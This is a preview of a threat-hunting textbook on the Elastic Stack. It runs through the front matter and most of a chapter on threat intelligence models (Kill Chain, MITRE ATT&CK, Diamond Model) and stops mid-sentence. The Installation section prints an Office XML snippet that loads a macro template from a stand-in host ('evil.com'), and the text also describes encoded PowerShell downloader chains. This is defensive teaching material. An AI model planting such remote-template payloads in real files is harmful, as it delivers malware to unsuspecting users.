39,59 €
Threat Hunting with Elastic Stack will show you how to make the best use of Elastic Security to provide optimal protection against cyber threats. With this book, security practitioners working with Kibana will be able to put their knowledge to work and detect malicious adversary activity within their contested network.
You'll take a hands-on approach to learning the implementation and methodologies that will have you up and running in no time. Starting with the foundational parts of the Elastic Stack, you'll explore analytical models and how they support security response and finally leverage Elastic technology to perform defensive cyber operations.
You’ll then cover threat intelligence analytical models, threat hunting concepts and methodologies, and how to leverage them in cyber operations. After you’ve mastered the basics, you’ll apply the knowledge you've gained to build and configure your own Elastic Stack, upload data, and explore that data directly as well as by using the built-in tools in the Kibana app to hunt for nefarious activities.
By the end of this book, you'll be able to build an Elastic Stack for self-training or to monitor your own network and/or assets and use Kibana to monitor and hunt for adversaries within your network.
Das E-Book können Sie in Legimi-Apps oder einer beliebigen App lesen, die das folgende Format unterstützen:
Seitenzahl: 317
Veröffentlichungsjahr: 2021
Solve complex security challenges with integrated prevention, detection, and response
Andrew Pease
BIRMINGHAM—MUMBAI
Copyright © 2021 Packt Publishing
All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.
Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.
Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.
Group Product Manager: Wilson Dsouza
Publishing Product Manager: Yogesh Deokar
Senior Editor: Rahul Dsouza
Content Development Editor: Sayali Pingale
Technical Editor: Shruthi Shetty
Copy Editor: Safis Editing
Project Coordinator: Neil Dmello
Proofreader: Safis Editing
Indexer: Tejal Soni
Production Designer: Shankar Kalbhor
First published: July 2021
Production reference: 1210721
Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.
978-1-80107-378-3
www.packt.com
To my children, who patiently sacrificed their time with me while I spent late nights bent over a keyboard. A special thanks to my wife, Stephanie, for never letting me quit anything.
– Andrew Pease
Andrew Pease began his journey into information security in 2002. He has performed security monitoring, incident response, threat hunting, and intelligence analysis for various organizations from the United States Department of Defense, a biotechnology company, and co-founded a security services company called Perched, which was acquired by Elastic in 2019. Andrew is currently employed with Elastic as a Principal Security Research Engineer where he performs intelligence and analytics research to identify adversary activity on contested networks.
He has been using Elastic for network and endpoint-based threat hunting since 2013, He has developed training on security workloads using the Elastic Stack since 2017, and currently works with a team of brilliant engineers that develop detection logic for the Elastic Security App.
Shimon Modi is a cybersecurity expert with over a decade of experience in developing leading-edge products and bringing them to market. He is currently director of product for Elastic Security and his team focuses on building ML capabilities to address security analyst challenges. Previously he was VP of product and engineering at TruSTAR Technology (acquired by Splunk). He was also a member of Accenture Technology Labs' Cyber R&D group and worked on solutions ranging from security analytics to IIoT security.
Shimon Modi has a Ph.D. from Purdue University focused on biometrics and information security. He has published more than 15 peer-reviewed articles and has presented at top conferences including IEEE, BlackHat, and ShmooCon.
Murat Ogul is a seasoned information security professional with two decades of experience in offensive and defensive security. His domain expertise is mainly in threat hunting, penetration testing, network security, web application security, incident response, and threat intelligence. He holds a master's degree in electrical-electronic engineering, along with several industry-recognized certifications, such as OSCP, CISSP, GWAPT, GCFA, and CEH. He is a big fan of open source projects. He likes contributing to the security community by volunteering at security events and reviewing technical books.
The Elastic Stack has long been known for its ability to search through tremendous amounts of data at incredible speeds. This makes the Elastic Stack a powerful tool for security workloads, and specifically, threat hunting. When threat hunting, you frequently don't know exactly what you're looking for. Having a platform at your fingertips that allows you to creatively explore your data is paramount to detecting adversary activities.
This book is for anyone new to threat hunting, new to leveraging the Elastic Stack for threat hunting, and everyone in between.
Chapter 1, Introduction to Cyber Threat Intelligence, Analytical Models, and Frameworks, lays the groundwork for the critical thinking skills and analytical models used throughout the book.
Chapter 2, Hunting Concepts, Methodologies, and Techniques, discusses how to apply models to collected data and hunt for adversaries.
Chapter 3, Introduction to the Elastic Stack, introduces the different parts of the Elastic Stack.
Chapter 4, Building Your Hunting Lab – Part 1, shows how to build a fully functioning Elastic Stack and victim machine to use for threat hunting research.
Chapter 5, Building Your Hunting Lab –Part 2, configures the Elastic Stack, builds a victim virtual machine, and ingests threat information data into the Elastic Stack.
Chapter 6,Data Collection with Beats and Elastic Agent, focuses on deploying various Elastic data collection tools to systems.
Chapter 7,Using Kibana to Explore and Visualize Data, introduces various query languages, data exploration techniques, and Kibana visualizations.
Chapter 8, The Elastic Security App, dives into the Elastic security technologies in Kibana used for threat hunting and analysis.
Chapter 9, Using Kibana to Pivot Through Data to Find Adversaries, explores using observations to perform targeted threat hunts and create tailored detection logic.
Chapter 10, Leveraging Hunting to Inform Operations, focuses on using threat hunting to assist in incident response operations.
Chapter 11, Enriching Data to Create Intelligence, shows how to enrich events to gain additional insights.
Chapter 12, Sharing Information and Analysis, explores how to describe data in a common format and how to share visualizations and detection logic with partners and peers.
You will need to have a healthy appetite for exploration. While there are specific tools covered in this book, the ability to learn and apply the concepts and theories to new platforms and use cases will make the information transcend beyond the specific examples that we'll cover in the book.
Every tool that we'll use in this book is completely free. While they may have licenses related to how they can be used, it was important that cost wasn't a limiting factor in your ability to learn how to use the Elastic Stack to threat hunt.
You can download the example code files for this book from GitHub at https://github.com/PacktPublishing/Threat-Hunting-with-Elastic-Stack. In case there's an update to the code, it will be updated on the existing GitHub repository.
We also have other code bundles from our rich catalog of books and videos available at
https://github.com/PacktPublishing/. Check them out!
Code in Action videos for this book can be viewed at https://bit.ly/3z4CAOV.
We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: http://www.packtpub.com/sites/default/files/downloads/9781801073783_ColorImages.pdf.
There are a number of text conventions used throughout this book.
Code in text: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "Let's use tcpdump to collect on my en0 interface, capturing full-sized packets (-s), and saving the file to local-capture.pcap."
A block of code is set as follows:
{
"acknowledged" : true,
"shards_acknowledged" : true,
"index" : "my-first-index"
}
Any command-line input or output is written as follows:
$ curl -X PUT "localhost:9200/my-first-index?pretty"
Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "The Administration interface is seemingly fairly sparse, but it allows you to drill down into detailed configurations for the security policies for the Elastic Agent."
Tips or important notes
Appear like this.
Feedback from our readers is always welcome.
General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at [email protected].
Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.
Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.
If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.
Once you've read Threat Hunting with Elastic Stack, we'd love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback.
Your review is important to us and the tech community and will help us make sure we're delivering excellent quality content.
This section will introduce you to the concepts of cyber threat intelligence and how to use analysis to create intelligence beyond simply uploading indicators of compromise.
This part of the book comprises the following chapters:
Chapter 1
,
Introduction to Cyber Threat Intelligence, Analytical Models, and Frameworks
Chapter 2
,
Hunting Concepts, Methodologies, and Techniques
Generally speaking, there are a few "shiny penny" terms in modern IT terminology – blockchain, artificial intelligence, and the dreaded single pane of glass are some classic examples. Cyber Threat Intelligence (CTI) and threat hunting are no different. While all of these terminologies are tremendously valuable, they are commonly used for figurative hand-waving by marketing and sales teams to procure a meeting with a C-suite. With that in mind, let's discuss what CTI and threat hunting are in practicality, versus as umbrella terms for all things security.
Through the rest of this book, we'll refer back to the theories and concepts that we will cover here. This chapter will focus a lot on critical thinking, reasoning processes, and analytical models; understanding these is paramount because threat hunting is not linear. It involves constant adaption with a live adversary on the other side of the keyboard. As hard as you are working to detect them, they are working just as hard to evade detection. As we'll discover as we progress through the book, knowledge is important, but being able to adapt to a rapidly changing scenario is crucial to success.
In this chapter, we'll go through the following topics:
What is cyber threat intelligence?
The Intelligence Pipeline
The Lockheed Martin Cyber Kill Chain
Mitre's ATT&CK Matrix
The Diamond Model
My experiences have led me to the opinion that CTI and threat hunting are processes and methodologies tightly coupled with, and in support of, traditional security operations (SecOps).
When we talk about traditional SecOps, we're referring to the deployment and management of various types of infrastructure and defensive tools – think firewalls, intrusion detection systems, vulnerability scanners, and antiviruses. Additionally, this includes some of the less exciting elements, such as policy, and processes such as privacy and incident response (not to say that incident response isn't an absolute blast). There are copious amounts of publications that describe traditional SecOps and I'm certainly not going to try and re-write them. However, to grow and mature as a threat hunter, you need to understand where CTI and threat hunting fit into the big picture.
When we talk about CTI, we mean the processes of collection, analysis, and production to transition data into information, and lastly, into intelligence (we'll discuss technologies and methodologies to do that later) and support operations to detect observations that can evade automated detections. Threat hunting searches for adversary activity that cannot be detected through the use of traditional signature-based defensive tools. These mainly include profiling and detecting patterns using endpoint and network activity. CTI and threat hunting combined are the processes of identifying adversary techniques and their relevance to the network being defended. They then generate profiles and patterns within data to identify when someone may be using these identified techniques and – this is the often overlooked part – lead to data-driven decisions.
A great example would be identifying that abusing authorized binaries, such as PowerShell or GCC, is a technique used by adversaries. In this example, both PowerShell and GCC are expected to be on the system, so their existence or usage wouldn't cause a host-based detection system to generate an alert. So CTI processes would identify that this is a tactic used by adversaries, threat hunting would profile how these binaries are used in a defended network, and finally, this information would be used to inform active response operations or recommendations to improve the enduring defensive posture.
Of particular note is that while threat hunting is an evolution from traditional SecOps, that isn't to say that it is inherently better. They are two sides of the same coin. Understanding traditional SecOps and where intelligence analysis and threat hunting should be folded into it is paramount to being successful as a technician, responder, analyst, or leader. In this chapter, we'll discuss the different parts of traditional security operations and how threat hunting and analysis can support SecOps, as well as how SecOps can support threat hunting and incident response operations:
Figure 1.1 – The relationship between IT and cyber security
In the following chapters, we'll discuss several models, both industry-standard ones as well as my own, along with my thoughts on them, what their individual strengths and weaknesses are, and their applicability. It is important to remember that models and frameworks are just guides to help identify research and defensive prioritizations, incident response processes, and tools to describe campaigns, incidents, and events. Analysts and operators get into trouble when they try to use models as one-size-fits-all solutions that, in reality, are purely linear and inflexibly rigid.
The models and frameworks that we'll discuss are as follows:
The Intelligence Pipeline
The Lockheed Martin Kill Chain
The MITRE ATT&CK Matrix
The Diamond Model
Finally, we'll discuss how the models and frameworks are most impactful when they are chained together instead of being used independently.
Threat hunting is more than comparing provided indicators of compromise (IOCs) to collected data and finding a "known bad." Threat hunting relies on the application and analysis of data into information and then into intelligence – this is known as the Intelligence Pipeline. To process data through the pipeline, there are several proven analytical models that can be used to understand where an adversary is in their campaign, where they'll need to go next, and how to prioritize threat hunting resources (mainly, time) to disrupt or degrade an intrusion.
The Intelligence Pipeline isn't my invention. I first read about it in an extremely nerdy traditional intelligence-doctrine publication from the United States Joint Chiefs of Staff, JP 2-0 (https://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/jp2_0.pdf). In this document, this process is referred to as the Relationship of Data, Information, and Intelligence process. However, as I've taken it out of that document and made some adjustments to fit my experiences and the cyber domain, I feel that the Intelligence Pipeline is more apt. It is the pipeline and process that you use to inform data-driven decisions:
Figure 1.2 – The Intelligence Pipeline
The idea of the pipeline is to introduce the theory that intelligence is made, and generally not provided. This is an anathema to vendors selling the product of actionable intelligence. I should note that selling data or information isn't wrong (in fact, it's really required in one form or another), but you should know precisely what you're getting – that is, data or information, not intelligence.
As illustrated, the operating environment is everything – your environment, the environment of your trust relationships, the environment of your MSSP, and so on. From here, events go through the following processes:
Events are collected and processed to turn them into data.
Context and enrichment are added to turn the data into information.
Internal analysis and production are applied to the information to create intelligence.
Data-driven decisions can be created (as necessary).
As an example, you might be informed that "this IP address was observed scanning for exposed unencrypted ports across the internet." This is data, but that's all it is. It isn't really even interesting. It's just the "winds of the internet." Ideally, this data would have context applied, such as "this IP address is scanning for exposed unencrypted ports across the internet for ASNs owned by banks"; additionally, the enrichment added could be that this IP address is associated with the command and control entities of a previously observed malicious campaign.
So now we know that a previously identified malicious IP address is scanning financial services organizations for unencrypted ports. This is potentially interesting as it has some context and enrichment and is perhaps very interesting if you're in the financial services vertical, meaning that this is information and is on its way to becoming intelligence. This is where most vendors lose their ability to provide any additional value. That's not to say that this isn't necessarily valuable, but an answer to "did this IP address scan my public environment and do I have any unencrypted exposed ports?" is a level of analysis and production that an external party cannot provide (generally). This is where you, the analyst or the operator, come in to create intelligence. To do this, you need to have a few things, most notably, your own endpoint and network observations so that you can help inform a data-driven decision about what your threat, risk, and exposure could be – and no less importantly, some recommendations on how to reduce those things. The skills that we'll teach later on in this book will discuss how we can do this.
As an internal organization, rarely do you have the resources at your disposal to collect the large swaths of data needed to (eventually) generate intelligence. Additionally, adding context and enrichment at that scale is monumentally expensive in terms of personnel, technology, and capital. So acquiring those services from industry partnerships, generic or vertical-specific Information Sharing and Analysis Centers (ISACs), government entities, and vendors is paramount to having a solid intelligence and threat hunting program. To restate what I mentioned previously, buying or selling "threat intelligence" isn't bad – it's necessary, you just need to know that what you're receiving isn't a magic bullet and almost certainly isn't "actionable intelligence" until it is analyzed into an intelligence product by internal resources so that decision-makers are properly informed in formulating their response.
Lockheed Martin is a United States technology company in the Defense Industrial Base (DIB) that, among other things, created a response model to identify activities that an adversary must complete to successfully complete a campaign. This model was one of the first to hit the mainstream that provided analysts, operators, and responders with a way to map an adversary's campaign. This mapping provided a roadmap that, once any adversary activity was detected, outlined how far into the campaign the adversary had gotten, what actions had not been observed yet, and (during incident recovery) what defensive technology, processes, or training needed to be prioritized.
An important note regarding the Lockheed Martin Cyber Kill Chain: it is a high-level model that is used to illustrate adversary campaign activity. Many tactics and techniques can cover multiple phases, so as we discuss the model below, the examples will be large buckets instead of specific tactical techniques. Some easy examples of this would be supply chain compromises and abusing trust relationships. These are fairly complex techniques that can be used for a lot of different phases in a campaign (or chained between campaigns or phases). Fear not, we'll look at a more specific model (the MITRE ATT&CK framework) in the next chapter.
Figure 1.3 – Lockheed Martin's Cyber Kill Chain
The Kill Chain is broken into seven phases:
Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command & Control
Actions on the Objective
Let's look at each of them in detail in the following sections.
The Reconnaissance phase is performed when the adversary is mapping out their target. This phase is performed both actively and passively through network and system enumeration, social media profiling, identifying possible vulnerabilities, identifying the protective posture (to include the security teams) of the targeted network, and identifying what the target has that may be of value (Does your organization have something of value such as intellectual property? Are you a part of the DIB? Are you part of a supply chain that could be used for a further compromise, personally identifiable/health information (PII/PHI)?).
Weaponization is one of the most expensive parts of the Kill Chain for the adversary. This is when they must go into their arsenal of tools, tactics, and techniques and identify exactly how they are going to leverage the information they collected in the previous phase to achieve their objectives. It's a potentially expensive phase that doesn't leave much room for error. Do they use their bleeding-edge zero-day exploits (that is, exploits that have not been previously disclosed), thus making them unusable in other campaigns? Do they try to use malware, or do they use a Living-Off-the-Land Binary (LOLBin)? Do too much and they're wasting their resources needed (personnel, capital, and time) to develop zero-days and complex malware, but too little and they risk getting caught and exposing their attack vehicle.
This phase is also where adversaries acquire infrastructure, both to perform the initial entry, stage and launch payloads, perform command and control, and if needed, locate an exfiltration landing spot. Depending on the complexity of the campaign and skill of the adversary, infrastructure is either stolen (exploiting and taking over a benign website as a launch/staging point) or purchasing infrastructure. Frequently, infrastructure is stolen because it is easier to blend in with normal network traffic for a legitimate website. Additionally, when you steal infrastructure, you don't have to put out any money for things that can be traced back to the actor (domain registrations, TLS certificates, hosting, and so on).
This phase is where the adversary makes their attempt to get into the target network. Frequently, this is attempted through phishing (generic, spear-, or whale-phishing, or even through social media). However, this can also be attempted through an insider, a hardware drop (the oddly successful thumb drive in a parking lot), or a remotely exploitable vulnerability.
Generally, this is the riskiest part of a campaign as it is the first time that the adversary is "reaching out and touching" their target with something that could tip off defenders that an attack is incoming.
This phase is performed when the adversary actually exploits the target and executes code on the system. This can be through the use of an exploit against a system vulnerability, the user, or any combination of the lot. An exploit against a system vulnerability is fairly self-explanatory – this either needs to be carried out by tricking the user into opening an attachment or link that executes an exploit condition (Arbitrary Code Execution (ACE)) or an exploit that needs to be remotely exploitable (Remote Code Execution (RCE)).
The Exploitation phase is generally the first time that you may notice adversary activity as the Delivery phase relies on organizations getting data, such as email, into their environment. While there are scanners and policies to strip out known bad, adversaries are very successful in using email as an initial access point, so the Exploitation phase is frequently where the first detection occurs.
This phase is when an initial payload is delivered as a result of the exploitation of the weaponized object that was delivered to the target. Installation generally has multiple sub-phases, such as loading multiple tools/droppers onto the target that will assist in maintaining a good foothold onto the system, to avoid the adversary losing a valuable piece of malware (or other malicious logic) to a lucky anti-virus detection.
As an example, the exploit may be to get a user to open a document that loads a remote template that includes a macro. When the document is opened, the remote template is loaded and brings the macro with it over TLS. Using this example, the email with the attachment looked like normal correspondence and the adversary didn't have to risk losing a valuable macro-enabled document to an email or anti-virus scanner:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
Type=http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
Target="file:///C:\Users\admin\AppData\Roaming\Microsoft\Templates\GoodTemplate.dotm?raw=true"
Targetmode="External"/></Relationships>
In the preceding snippet, we can see a normal Microsoft Word document template. Specifically take note of the Target="file:///" section, which defines the local template (GoodTemplate.dotm). In the following snippet, an adversary, using the same Target= syntax, is loading a remote template that includes malicious macros. This process of loading remote templates is allowed within the document standards, which makes it a prime candidate for abuse:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://evil.com/EvilTemplate.dotm?raw=true" Targetmode="External"/></Relationships>
This can go on for several phases, each iteration being more and more difficult to track, using encryption and obfuscation to hide the actual payload that will finally give the adversary sufficient cover and access to proceed without concern for detection.
As a real-world example, during an incident, I observed an adversary use an encoded PowerShell script to download another encoded PowerShell script from the internet, decode it, and that script then downloaded another encoded PowerShell script, and so on, to eventually download five encoded PowerShell scripts, at which point the adversary believed they weren't being tracked (spoiler: they were).
The Command & Control (C2) phase is used to establish remote access over the implant, and ensure that it is able to evade detection and persist through normal system operation (reboots, vulnerability/anti-virus scans, user interaction with the system, and so on).
Other phases tend to move fairly quickly; however, with advanced adversaries, the Installation and C2 phases tend to slow down to avoid detection, often remaining dormant between phases or sub-phases (sometimes using the multiple dropper downloads technique described previously).
This phase is when the adversary performs the true goal of their intrusion. This can be the end of the campaign or the beginning of a new phase. Traditional objectives can be anything from loading annoying adware, deploying ransomware, or exfiltrating sensitive data. However, it is important to remember that this access itself could be the objective, with the implants sold to bad actors on the dark/deep web who could use them for their own purposes.
As noted, this can launch into a new campaign phase and begin by restarting from the Reconnaissance phase from within the network to collect additional information to dig deeper into the target. This is common with compromises of Industrial Control Systems (ICSes) – these systems aren't (supposed to be) connected to the internet, so frequently you have to get onto a system that does access the internet and then use that as a foothold to access the ICS, thus starting a new Kill Chain process.
Our job as analysts, operators, and responders is to push the adversary as far back into the chain as possible to the point that the expense of attacking outweighs the value of success. Make them pay for every bit they get into our network and it should be the last time they get in. We should identify and share every piece of infrastructure we detect. We should analyze and report every piece of malware or LOLBin tactic we uncover. We should make them burn zero-day after zero-day exploit, only for us to detect and stop their advance. Our job is to make the adversary work tremendously hard to make any advance in our network.
The MITRE Corporation is a federally funded group used to perform research and development for several government agencies. One of the many contributions they have made to cyber is a series of detailed and tactical matrices that are used to describe adversary activities, known as the Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrices. There are three main matrices, Enterprise, Mobile, and ICS.
The Enterprise Matrix includes tactics and techniques focused on preparatory phases (similar to the Reconnaissance and Weaponization phases from the Lockheed Martin Cyber Kill Chain), traditional operating systems, ICSes, and network-centric adversary tactics.
The Mobile Matrix includes tactics and techniques focused on identifying post-exploitation adversary activities targeting Apple's iOS and the Android mobile operating systems.
The ICS Matrix includes tactics and techniques focused on identifying post-exploitation adversary activities targeting an ICS network.
The matrices are all built upon another MITRE framework known as the Cyber Analytics Repository (CAR), which is focused purely on adversary analytics. The ATT&CK matrices are an abstraction that allows you to view the analytics, by technique, by the tactic.
All of the matrices use a grouping schema of tactic, technique, and in the case of the Enterprise Matrix, sub-technique. When thinking about the differences between a tactic, a technique, and an analytic, all three of these elements describe aggressor behavior in a different, but associated, context:
A tactic is the highest level of the actor's behavior (what they want to achieve – initial access, execution, and so on).
A technique is more detailed and carries the context of the tactic (what they are going to use to achieve their tactic – spear phishing, malware, and so on).
An analytic is a highly detailed description of the behavior and carries with it the context of the technique (for instance, the attacker will send an email with malicious content to achieve the initial access).
MITRE uses 14 tactics and Matrix-specific techniques/sub-techniques:
Reconnaissance (PRE matrix only)
– Techniques for information collection on the target
Resource Development (PRE matrix only)
– Techniques for infrastructure acquisition and capabilities development
Initial Access
– Techniques to gain an initial foothold into a target environment
Execution
– Techniques to execute code within the target environment
Persistence
– Techniques that maintain access to the target environment
Privilege Escalation
– Techniques that escalate access within the target environment
Defense Evasion
– Techniques to avoid being detected
Credential Access
– Techniques to acquire internal/additional account credentials
Discovery
– Techniques to learn more about the target environment (networks, services, and so on)
Lateral Movement
– Techniques to expand access beyond the initial entry point
Collection
– Techniques to collect information or data for follow-on activities
Command and Control
– Techniques to control implants within the target environment
Exfiltration
– Techniques to steal collected data from the target environment
Impact
– Techniques to negatively deny, degrade, disrupt, or destroy assets, processes, or operations with the target environment
Within these high-level tactics, there are multiple techniques and sub-techniques used to describe the adversary's actions. Two example techniques and sub-techniques (of the nine techniques available) in the Initial Access tactic are as follows:
Table 1.1 – An example of the MITRE ATT&CK tactic, technique, and sub-technique relationship
Elastic, wanting to describe detections within the proper context, has added MITRE ATT&CK elements to each of its detection rules. We'll discuss this in detail later on:
Figure 1.4 – An example of the MITRE ATT&CK framework in the Elastic Security app
As we can see, MITRE's ATT&CK matrices are much more detailed than the Lockheed Martin Cyber Kill Chain, but that isn't to say that one is necessarily better than the other; both have their uses. As an example, when producing technical writing or briefings, being able to describe that the adversary's Resource Development tactic included the technique of them developing capabilities, and exploits specifically, is valuable; however, if the audience isn't too technical, simply being able to state that the adversary weaponized their attack (using the Lockheed Martin Kill Chain) could be easier to understand.
The Diamond Model (The Diamond Model of Intrusion Analysis, Caltagirone, Sergio ; Pendergast, Andrew ; Betz, Christopher, https://apps.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf) was created by a non-profit organization called the Center for Cyber Intelligence Analysis and Threat Research (CCIATR). The paper, titled The Diamond Model of Intrusion Analysis, was released in 2013 with the novel goal to provide a standardized approach to characterize campaigns, differentiate one campaign from another, track their life cycles, and finally, develop countermeasures to mitigate them.
The Diamond Model uses a simple visual to illustrate six elements valuable for campaign tracking: Adversary, Infrastructure, Victim, Capabilities, Socio-political, and Tactics, Techniques, and Procedures (TTP).
This element describes the entity that is the threat actor involved in the campaign, either directly or even indirectly. This can include individual names, organizations, monikers, handles, social media profiles, code names, addresses (physical, email, and so on), telephone numbers, employers, network-connected assets, and so on. Essentially, features that you can use to describe the bad guy.
Important note
Network-connected assets can fall into either an adversary or infrastructure node depending on the context. A computer named cruisin-box may be used by the adversary for leisure activities on the internet and be used to describe the person, while hax0r-box may be used by the adversary for network attack and exploitation campaigns and be used to describe the attack infrastructure.
This element describes the entity that describes the adversary-controlled infrastructure leveraged in the campaign. This can include things such as IP addresses, hostnames, domain names, email addresses, network-connected assets, and so on. As we track the life cycle of the campaign and when changing the Diamond Model to the Lockheed Martin Kill Chain, and even MITRE's ATT&CK matrices, the infrastructure can start as an external entity but quickly become an internal entity.
This element
